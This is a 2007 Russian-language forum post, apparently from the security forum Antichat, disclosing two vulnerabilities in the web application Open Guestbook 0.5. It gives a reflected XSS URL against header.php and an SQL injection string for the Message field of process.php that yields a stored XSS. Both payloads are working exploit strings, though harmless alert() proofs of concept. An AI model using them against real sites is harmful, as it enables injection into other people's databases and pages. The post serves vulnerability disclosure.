15.09.2007, 11:03
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Open Guestbook 0.5
Скачать можно здесь:
http://sourceforge.net/project/showf...group_id=82463
1) Пассивная XSS
Код:
http://localhost/header.php?title=</title><script>alert(123);</script>
2) SQL инъекция/активная XSS
В скрипте process.php из-за отсутсвия фильтрации можно провести инъекцию в запросе INSERT...
При добавление сообщения в поле Message вводим:
Код:
','','','', '', '', '', '', '', '><script>alert(111);</script>', '', '', '')/*
В результате получим выполнение нашего скрипта при просмотре сообщений, т.е. получаем активную xss.
Последний раз редактировалось Grey; 15.09.2007 в 11:06..
|
|
|